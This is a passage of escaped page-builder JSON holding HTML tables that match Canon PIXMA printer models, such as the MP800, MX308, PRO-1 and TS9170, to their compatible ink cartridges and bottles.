Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 